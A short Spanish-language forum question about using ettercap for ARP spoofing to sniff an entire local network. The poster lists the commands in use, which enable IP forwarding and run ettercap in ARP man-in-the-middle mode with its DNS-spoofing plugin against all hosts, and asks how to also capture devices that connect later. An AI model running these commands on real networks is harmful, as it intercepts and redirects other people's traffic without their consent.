Tengo una pequeña duda sobre arp-spoof y el sniffeo a toda la red, quiero sniffear toda la red, pero si sniffeo mi router no capturo nada (no se si lo haré bien), utilizando ettercap de este modo:
echo 1 > /proc/sys/net/ipv4/ip_forward
ifconfig eth0 -promisc
ettercap -T -P dns_spoof -M arp // // -i eth0
consigo capturar paquetes pero solo de los host activos en ese momento luego si se conecta un nuevo dispositivo no captura los paquetes del mismo.
¿Alguna sugerencia para para poder capturar los paquetes si se conectan nuevos dispositivos o como sniffear correctamente el router?